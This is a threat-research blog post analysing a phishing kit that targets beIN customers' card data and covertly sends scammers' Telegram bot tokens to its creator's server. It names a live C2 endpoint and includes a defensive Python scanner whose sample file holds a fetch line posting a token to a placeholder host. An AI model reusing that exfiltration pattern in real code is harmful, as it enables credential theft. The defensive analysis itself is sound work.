At Bolster Research Labs, we recently observed that phishing kit creators constantly target entertainment media groups with a worldwide user base, like Disney+. (We have already dissected the specific behaviors of a phishing kit targeting Disney+.)
In our continuous pursuit of understanding the scope of these concerns, we turn our attention to another media heavyweight: beIN Media Group.
beIN, a well-known Qatari state-owned company specializing in worldwide sports and entertainment, headquartered in Doha, Qatar, has become the latest victim of such phishing attempts. Our findings point to a similar phishing kit intended to target beIN’s consumer base.
Surprisingly, this phishing kit is freely available in the underbelly of a cybercrime channel, yet broad exploitation has not been seen so far. This raises questions about the kit’s hidden motivations and the deliberate timing of its release. The deceptive method devised by the phishing kit’s developer is the focal point of our examination.
Not only are beIN Media Group’s unsuspecting customers at risk, but so are the fraudsters. The developer has integrated a clever trap into the kit: a snare designed to steal the Telegram bot token from the scammers who use it in their illegal activities.
This devious strategy is a game changer, showing a multifaceted threat landscape in which trust is a liability and even cybercriminals are vulnerable to predation. It serves as a harsh reminder that predators can rapidly become prey in the digital arena.
The focal point of this blog is to unveil the cunning tactic employed by the developer of the phishing kit that steals the Telegram Bot token from scammers who are reusing this phishing kit to scam customers of beIN Media Group.
Phishing Kit Structure
This phishing kit is designed to steal credit and debit card information from beIN users and then exfiltrate it via a Telegram bot, a technique common to most phishing campaigns we observe.
This phishing kit is not as sophisticated as others, most likely because it is still under development. The file anti1.php, which based on our previous phishing kit analyses is the anti-bot component, contains logic intended to filter unwanted traffic such as crawlers, but that logic appears incomplete. Because it does not block such traffic by default, security scanners and AI classification engines can crawl and classify the hosted phishing site.
Data exfiltration
This phishing kit is designed to exfiltrate the credit/debit card information and OTP via the Telegram bot.
Both messages posted to Telegram contain sensitive information: the card details, the transaction or account verification code (OTP), and the card expiration date. The attacker later sells this data on Telegram or on other dark web forums.
Phishing Kit Creator Stealing Telegram Bot Token
While testing this phishing kit’s capabilities locally, we found that the kit steals the Telegram bot token (the one configured by the scammers who host the kit in the real world) and exfiltrates it with a POST request to a previously unknown endpoint: hxxp://102.165.14.4:5000/receive_token?referrer=loco (the endpoint was still active at the time of writing).
We found that the Telegram token exfiltration is triggered by a single obfuscated function in the kit’s JQ.js file.
Scanning the IP address further, we found five TCP ports open: 135, 139, 3389, 500 and 5985. Based on the WHOIS record, the threat actor behind the kit is likely using IP management infrastructure provided by IPXO.
The IP address above acts as a C&C server that receives the stolen tokens; on port 5000 it serves a Werkzeug/2.3.7 Python/3.11.4 application (the banner of Werkzeug’s built-in development server, as used by Flask).
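The token-stealing backdoor described above is easy to miss because the kit also talks to api.telegram.org legitimately (from the scammer’s point of view). The following Python scanner is an added example, not code from the kit or from Bolster: it walks a recovered kit’s files and surfaces any Telegram bot token, any endpoint other than api.telegram.org, and cheap obfuscation markers such as atob(). The sample files and the TEST-NET IP in them are constructed for the demonstration and are not the real kit.

```python
import re
from urllib.parse import urlparse

# Shape of a Telegram bot token: numeric bot id, colon, 35-character secret.
TOKEN_RE = re.compile(r"\b\d{6,12}:[A-Za-z0-9_-]{35}\b")
# Plain and defanged (hxxp) URLs as they appear in kit source or in reports.
URL_RE = re.compile(r"h(?:tt|xx)ps?://[^\s'\"<>)]+", re.IGNORECASE)
# Cheap obfuscation markers often seen in jQuery look-alike files.
OBFUSCATION_MARKERS = ("atob(", "fromCharCode", "unescape(", "eval(")

def scan_kit(files):
    """files: {path: source text}. Returns, per file, the tokens found,
    endpoints outside api.telegram.org, and any obfuscation markers."""
    report = {}
    for path, src in files.items():
        tokens = sorted(set(TOKEN_RE.findall(src)))
        foreign = []
        for url in URL_RE.findall(src):
            host = urlparse(url.lower().replace("hxxp", "http", 1)).hostname or ""
            if host != "api.telegram.org":
                foreign.append(url)
        markers = [m for m in OBFUSCATION_MARKERS if m in src]
        if tokens or foreign or markers:
            report[path] = {"tokens": tokens,
                            "foreign_endpoints": foreign,
                            "obfuscation": markers}
    return report

def backdoor_suspected(report):
    """True when some file both posts to a non-Telegram host and is obfuscated."""
    return any(r["foreign_endpoints"] and r["obfuscation"] for r in report.values())

# Constructed sample kit files (not the real kit); 203.0.113.10 is a placeholder.
SAMPLE_KIT = {
    "send.php": '<?php $token = "1234567890:AAEXAMPLEconstructedTokenValue00000";\n'
                'file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$id&text=$msg");',
    "JQ.js": 'var t=atob(window.__k);fetch("http://203.0.113.10:5000/receive_token?referrer=loco",'
             '{method:"POST",body:"token="+t});',
}

if __name__ == "__main__":
    findings = scan_kit(SAMPLE_KIT)
    for path, r in findings.items():
        print(path, r)
    print("backdoor suspected:", backdoor_suspected(findings))
```

Running the scanner over the sample flags JQ.js as the only file that posts the token somewhere other than Telegram, which is exactly the behaviour to look for before trusting any "free" kit found on a cybercrime channel.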
MITRE ATT&CK
Understanding the tactics and techniques is critical for creating strong security measures and preventing potential threats. The MITRE ATT&CK TTPs are given below:
| ID | Tactic | Technique | Procedure |
|---|---|---|---|
| T1598 | Reconnaissance | Phishing for Information | Spearphishing targeting beIN Media Group customers to obtain Personally Identifiable Information (PII) and credentials. |
| T1566 | Initial Access | Phishing | Spearphishing targeting beIN Media Group customers. |
| T1204 | Execution | User Interface | Adversaries rely on users/customers entering their credentials and PII through the login portal. |
| T1505 | Persistence | Server Software Component | Through the phishing kit’s backdoor, the kit’s creator retains continuous access to the scammer’s operations. |
| T1656 | Defense Evasion | Impersonation | Impersonating beIN Media Group in order to persuade and trick customers and users. |
| T1056 | Credential Access | Input Capture | Adversaries capture user input to obtain credentials and credit card details, in this case through the login portal. |
| T1087 | Discovery | Account Discovery | Adversaries collect information from the compromised user. |
| T1056 | Collection | Input Capture | Adversaries capture user input to obtain credentials and credit card details, in this case through the login portal. |
| T1102 | Command & Control | Web Service | Telegram and 102.165.14.4 act as C2 mechanisms for relaying data to/from a compromised system/user. |
| T1041 | Exfiltration | Exfiltration Over C2 Channel | Adversaries exfiltrate data over the C2 channel. In this case, the Telegram bot and 102.165.14.4 serve as the C2 servers that receive the exfiltrated tokens. |
Impact & mitigation
| Impact | Mitigation |
|---|---|
| The collected data contains Personally Identifiable Information (PII) of the users interacting with the kit, which could later be sold on dark web forums, resulting in a data breach. | Regularly performing vulnerability assessments, conducting penetration testing to identify gaps in security protocols, and keeping up to date with the latest phishing trends and techniques are essential for maintaining a secure IT environment. |
| Loss of trust and reputation, financial loss. | Cybersecurity incorporated into employee onboarding, creating awareness among individuals at an early stage. |
Conclusion
In conclusion, our investigation into the phishing kit targeting beIN Media Group reveals a fascinating and ironic twist in cybercrime. The creators of this phishing kit distributed it freely on cybercrime channels and stole Telegram bot tokens from the scammers who would host it. Those stolen tokens can be abused for various malicious purposes.
Furthermore, our analysis at Bolster Research Labs sheds light on the operation of this specific phishing kit. It contributes to a broader understanding of cybercriminal tactics and the need for continuous innovation in cybersecurity defenses. Sharing our findings becomes crucial in the collective fight against cybercrime as we continue to uncover and dissect these threats.
Bolster’s anti-phishing and domain monitoring technology protects your business from evolving phishing threats. With the industry’s leading LLMs and continuous scanning technology that quickly identifies threats and misuse of your branded assets, you can trust Bolster will protect your business.
See Bolster in action when you request a demo.